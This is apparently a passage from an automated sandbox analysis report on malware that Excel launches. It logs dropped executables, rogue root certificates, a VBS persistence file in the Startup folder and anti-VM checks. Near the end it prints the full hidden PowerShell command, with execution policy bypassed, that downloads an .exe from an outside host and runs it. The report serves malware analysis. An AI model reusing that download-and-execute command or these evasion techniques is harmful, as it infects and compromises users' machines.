              Source: Yara matchFile source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00AA189C push 0C418B00h; ret 5_2_00AA18A3
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D2E010 push 14418B00h; ret 5_2_00D2E023
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D2F15C push 08418B00h; ret 5_2_00D2F163
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D2E17C push 0C418B00h; ret 5_2_00D2E183
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D28AB9 push 8C00670Dh; retf 5_2_00D28AC5
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D235F0 push ecx; retf 5_2_00D235F6
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D2EEB0 push 0C418B00h; ret 5_2_00D2EEC3
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D2D670 push 0C418B00h; ret 5_2_00D2D683
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D2363B push es; retf 5_2_00D23641
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D2D62A push 0C418B00h; ret 5_2_00D2D683
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D2DF90 push 14418B00h; ret 5_2_00D2E023
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D2EFA0 push 10418B00h; ret 5_2_00D2EFB3
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_050235A6 push edi; retf 5_2_050235AC
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_0502271E push edi; retf 5_2_05022740
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0069FA88 pushfd ; retf 8_2_0069FA95
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_023A8AB9 push 8C00670Dh; retf 8_2_023A8AC5
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_023A363B push es; retf 8_2_023A3641
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_023A35F0 push ecx; retf 8_2_023A35F6
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_054035A6 push edi; retf 8_2_054035AC
              Source: tmp7752.exe.2.drStatic PE information: section name: .text entropy: 7.764858525500812
              Source: svcost.exe.5.drStatic PE information: section name: .text entropy: 7.764858525500812

              Persistence and Installation Behavior

              barindex
              Installs new ROOT certificates
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\tmp7752.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeFile created: C:\Users\user\AppData\Roaming\svcost.exeJump to dropped file

              Boot Survival

              barindex
              Drops VBS files to the startup folder
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbsJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: tmp7752.exe, 00000005.00000002.489076925.0000000002882000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeMemory allocated: 200000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeMemory allocated: 2820000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeMemory allocated: 450000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeMemory allocated: 5450000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeMemory allocated: 17450000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeMemory allocated: 250000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeMemory allocated: 2490000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeMemory allocated: 250000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2067Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3692Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe TID: 3776Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe TID: 3780Thread sleep count: 113 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe TID: 3780Thread sleep count: 163 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 3948Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 3956Thread sleep count: 165 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 3964Thread sleep count: 130 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
              Source: svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
              Source: svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_0020ECA8 LdrInitializeThunk,5_2_0020ECA8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Bypasses PowerShell execution policy
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp7752.exe "C:\Users\user\AppData\Local\Temp\tmp7752.exe" Jump to behavior
